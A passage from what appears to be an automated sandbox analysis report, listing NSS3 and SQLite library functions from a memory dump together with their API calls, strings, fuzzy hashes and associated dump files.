Part of subcall function 6C7095B0: PR_Unlock.NSS3(?,?,?,?,6C7200D2,00000000), ref: 6C709605

PORT_NewArena_Util.NSS3(00000800), ref: 6C713CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C713CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C713CE1

Part of subcall function 6C713090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C72AE42), ref: 6C7130AA
Part of subcall function 6C713090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7130C7
Part of subcall function 6C713090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7130E5
Part of subcall function 6C713090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C713116
Part of subcall function 6C713090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C71312B
Part of subcall function 6C713090: PK11_DestroyObject.NSS3(?,?), ref: 6C713154
Part of subcall function 6C713090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C71317E

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: dbf01b1e9b4ea44d432f3459ab2aae7be1cd0f784a3e2f8136d43a096fe79991
Instruction ID: e6398f4d9dead3130cfc57302371d974a7a34a43e44bfc323283872d3ed29307
Opcode Fuzzy Hash: dbf01b1e9b4ea44d432f3459ab2aae7be1cd0f784a3e2f8136d43a096fe79991
Instruction Fuzzy Hash: 1561B5B1A04300ABEB105E65DE49FA776BDAF04748F4C8078FD099AE52F731D918C7A1

Function 6C702C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(BAEEE052), ref: 6C702C5D

Part of subcall function 6C760D30: calloc.MOZGLUE ref: 6C760D50
Part of subcall function 6C760D30: TlsGetValue.KERNEL32 ref: 6C760D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C702C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C702CE0

Part of subcall function 6C702E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C702CDA,?,00000000), ref: 6C702E1E
Part of subcall function 6C702E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C702E33
Part of subcall function 6C702E00: TlsGetValue.KERNEL32 ref: 6C702E4E
Part of subcall function 6C702E00: EnterCriticalSection.KERNEL32(?), ref: 6C702E5E
Part of subcall function 6C702E00: PL_HashTableLookup.NSS3(?), ref: 6C702E71
Part of subcall function 6C702E00: PL_HashTableRemove.NSS3(?), ref: 6C702E84
Part of subcall function 6C702E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C702E96
Part of subcall function 6C702E00: PR_Unlock.NSS3 ref: 6C702EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C702D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C702D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C702D3F
free.MOZGLUE(00000000), ref: 6C702D73
CERT_DestroyCertificate.NSS3(?), ref: 6C702DB8
free.MOZGLUE ref: 6C702DC8

Part of subcall function 6C703E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C703EC2
Part of subcall function 6C703E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C703ED6
Part of subcall function 6C703E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C703EEE
Part of subcall function 6C703E60: PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C703F02
Part of subcall function 6C703E60: PL_FreeArenaPool.NSS3 ref: 6C703F14
Part of subcall function 6C703E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C703F27

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 0f5141a072f3e7fd5d39799386cec90768cdee1e41bccb5f187f48719e5cf76e
Instruction ID: cb994e7b5d94ef4b8fd978588da8294331ef4618e1588d0908030055a993c513
Opcode Fuzzy Hash: 0f5141a072f3e7fd5d39799386cec90768cdee1e41bccb5f187f48719e5cf76e
Instruction Fuzzy Hash: 7D51DEB2B042129BDB119E29DE8AB5B77E5EF84348F140439EC5983751EB31EC15CB92

Function 6C728F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C728FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C728FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C728FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C729013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C729042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C72905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C729073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C7290EC

Part of subcall function 6C6F0F00: PR_GetPageSize.NSS3(6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F1B
Part of subcall function 6C6F0F00: PR_NewLogModule.NSS3(clock,6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C71DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C729111

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID:
API String ID: 2831689957-0
Opcode ID: adc9101c25eec0d7bfdb43b9337406391258416b7b032c6d72e0bf8f52107497
Instruction ID: e420751dd47f9d31a489ea48451b41663505dd91bdf06aabfece555f977a1b98
Opcode Fuzzy Hash: adc9101c25eec0d7bfdb43b9337406391258416b7b032c6d72e0bf8f52107497
Instruction Fuzzy Hash: 5251BE71A042058FDB50EF39C5882A9BBF1BF0A318F095579DC448B716EB39E885CBC1

Function 6C708980 Relevance: 13.6, APIs: 9, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C707310), ref: 6C7089B8

Part of subcall function 6C761200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7088A4,00000000,00000000), ref: 6C761228
Part of subcall function 6C761200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C761238
Part of subcall function 6C761200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7088A4,00000000,00000000), ref: 6C76124B
Part of subcall function 6C761200: PR_CallOnce.NSS3(6C862AA4,6C7612D0,00000000,00000000,00000000,?,6C7088A4,00000000,00000000), ref: 6C76125D
Part of subcall function 6C761200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C76126F
Part of subcall function 6C761200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C761280
Part of subcall function 6C761200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C76128E
Part of subcall function 6C761200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C76129A
Part of subcall function 6C761200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7612A1

PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C707310), ref: 6C7089E6
PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C708A00
CERT_CopyRDN.NSS3(00000004,00000000,6C707310,?,?,00000004,?), ref: 6C708A1B
PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C708A74
PR_SetError.NSS3(FFFFE005,00000000,00000000,?,00000028,?,?,6C707310), ref: 6C708AAF
PORT_ArenaAlloc_Util.NSS3(00000004,00000008,00000000,?,00000028,?,?,6C707310), ref: 6C708AF3
PORT_ArenaGrow_Util.NSS3(00000004,?,C8850FC0,00000000,00000000,?,00000028,?,?,6C707310), ref: 6C708B1D

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_$CriticalFreeGrow_PoolSectionfree$Arena_CallClearCopyDeleteEnterErrorOnceUnlockValue
String ID:
API String ID: 3791662518-0
Opcode ID: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction ID: bd324317b7d3d5e0e70c323ead515996fd043976f85c403d12edbbaba2d068b1
Opcode Fuzzy Hash: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction Fuzzy Hash: 9851CEF1B01210AFE7108F15CE49B6A77E8FB8271CF15816AEC199BB91E771E805CB91

Function 6C707CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7040D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C703F7F,?,00000055,?,?,6C701666,?,?), ref: 6C7040D9
Part of subcall function 6C7040D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C701666,?,?), ref: 6C7040FC
Part of subcall function 6C7040D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C701666,?,?), ref: 6C704138

PR_GetCurrentThread.NSS3 ref: 6C707CFD

Part of subcall function 6C7C9BF0: TlsGetValue.KERNEL32(?,?,?,6C810A75), ref: 6C7C9C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6C829030), ref: 6C707D1B

Part of subcall function 6C75FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C701A3E,00000048,00000054), ref: 6C75FD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6C829048), ref: 6C707D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C707D50
PR_GetCurrentThread.NSS3 ref: 6C707D61
PORT_ArenaMark_Util.NSS3(?), ref: 6C707D7D
free.MOZGLUE(?), ref: 6C707D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C707DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C707E19

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: 339946b029bd5e7d5ba5c571765c9e27ffdefa9011af83470b0aa05a5bd8c80c
Instruction ID: 683b21314a5bc0a4357cc56a2d43ecabd00d0af3d8f069203bb21ffa1a346837
Opcode Fuzzy Hash: 339946b029bd5e7d5ba5c571765c9e27ffdefa9011af83470b0aa05a5bd8c80c
Instruction Fuzzy Hash: C441E6B2B0011A9BDF009E699E4ABAF37E4AF5035CF050074EC19ABB51E730E955C7E1

Function 6C763CA0 Relevance: 13.6, APIs: 9, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C7638BD), ref: 6C763CBE
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C7638BD), ref: 6C763CD1

Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C7638BD), ref: 6C763CF0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C83B369,000000FF,00000000,00000000,?,000000FF,00000000,00000000,6C7638BD), ref: 6C763D0B
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,6C7638BD), ref: 6C763D1A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C83B369,000000FF,00000000,00000000,00000000,6C7638BD), ref: 6C763D38
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6C763D47
free.MOZGLUE(00000000), ref: 6C763D62
free.MOZGLUE(000000FF,?,000000FF,00000000,00000000,6C7638BD), ref: 6C763D6F

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_Utilfree$Value_wfopenmalloc
String ID:
API String ID: 2345246809-0
Opcode ID: aea2e5d6615db2d5722687c33f52451f51e71255752243565fffa66c874238a6
Instruction ID: 6dba5df32ec5573321652aa7cec3d9170dcf23771d82ba4fc2c42aa0d3629c93
Opcode Fuzzy Hash: aea2e5d6615db2d5722687c33f52451f51e71255752243565fffa66c874238a6
Instruction Fuzzy Hash: 3A21F5B570151277FB60667B8D0AE7739ACDB867A9F140235BC38E7AC1DB64C800C6B1

Function 6C69E890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C69E922
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C69E9CF
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C69EA0F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C69EB20
memcpy.VCRUNTIME140(?,?,?), ref: 6C69EB57

Strings

unknown column "%s" in foreign key definition, xrefs: 6C69ED18
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C69EDC2
foreign key on %s should reference only one column of table %T, xrefs: 6C69EE04

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: memcpystrlen$memset
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 638109778-272990098
Opcode ID: aed8ff88a69ccab10378bb21dc29dc0c979d2931b99c55a45e677606de51e748
Instruction ID: 698dcc4d1f24b30ec92311c3bf7aae3f8852fea9aa989772fcf1e4438b60446b
Opcode Fuzzy Hash: aed8ff88a69ccab10378bb21dc29dc0c979d2931b99c55a45e677606de51e748
Instruction Fuzzy Hash: 4402AF71E0110ACFDB04CF99C580AEEB7F2BF8A318F284169D815ABB55D731A845CBE4

Function 6C6A7D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6A7E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6A7E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C6A7EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6A7F2E

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6A7ED8, 6C6A7F08, 6C6A7F19
database corruption, xrefs: 6C6A7EE2, 6C6A7F23
%s at line %d of [%.10s], xrefs: 6C6A7EE7, 6C6A7F28

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: d52a70442126236f669d538aa29c9fcc9d84cc6982b9d1c744fab6506b6d1416
Instruction ID: f934cb1a5310f45ec70ad8afe6eb488bc7752c5ef8b436400a870b9e9f4cb30d
Opcode Fuzzy Hash: d52a70442126236f669d538aa29c9fcc9d84cc6982b9d1c744fab6506b6d1416
Instruction Fuzzy Hash: 4761C274A042159FCB15CFA5C890BAA37B2BF86308F1449A8EC085BB56D730EC57CBE5

Function 6C6F69A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 6C68CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6EF9C9,?,6C6EF4DA,6C6EF9C9,?,?,6C6B369A), ref: 6C68CA7A
Part of subcall function 6C68CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C68CB26

memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6F6A02
EnterCriticalSection.KERNEL32(?), ref: 6C6F6AA6
LeaveCriticalSection.KERNEL32(?), ref: 6C6F6AF9
sqlite3_free.NSS3(00000000), ref: 6C6F6B15
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000BCCC), ref: 6C6F6BA6

Strings

winDelete, xrefs: 6C6F6B71
delayed %dms for lock/sharing conflict at line %d, xrefs: 6C6F6B9F

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_freesqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 1816828315-1405699761
Opcode ID: cb5dc6307a76d61f46391d5c0e45f0cfb8ff9da78828d6d753cd395e7f1904bc
Instruction ID: 263900bc738eb114f6899898c821f06e7db9a98655c30ecc34b980e60d3b54bc
Opcode Fuzzy Hash: cb5dc6307a76d61f46391d5c0e45f0cfb8ff9da78828d6d753cd395e7f1904bc
Instruction Fuzzy Hash: 08512331B042159BEB289F65DC59ABE3776FF87318F044138E426C7680DB789902CBD6

Function 6C68FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C68FD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C68FD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C68FE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C68FE83

Part of subcall function 6C68FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C68FEFA
Part of subcall function 6C68FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C68FF3B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C68FD64, 6C68FE26
database corruption, xrefs: 6C68FD6E, 6C68FE30
%s at line %d of [%.10s], xrefs: 6C68FD73, 6C68FE35

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: c929f5957afb30fca6f0ac252e5ff473e91495b28d355a2835062c4a3dfb9fb9
Instruction ID: 8c1c24453451d4d476003430cf1dec909f119e780500c80e01100d425a0a8f77
Opcode Fuzzy Hash: c929f5957afb30fca6f0ac252e5ff473e91495b28d355a2835062c4a3dfb9fb9
Instruction Fuzzy Hash: 19519270A012159FCB04CF99C994AAEB7F1FF48308F144469EA05AB752E735EC51CBA5

Function 6C7D2F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7D2FFD
sqlite3_initialize.NSS3 ref: 6C7D3007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7D3032
sqlite3_mprintf.NSS3(6C83AAF9,?), ref: 6C7D3073
sqlite3_free.NSS3(?), ref: 6C7D30B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C7D30C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C7D30BB

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
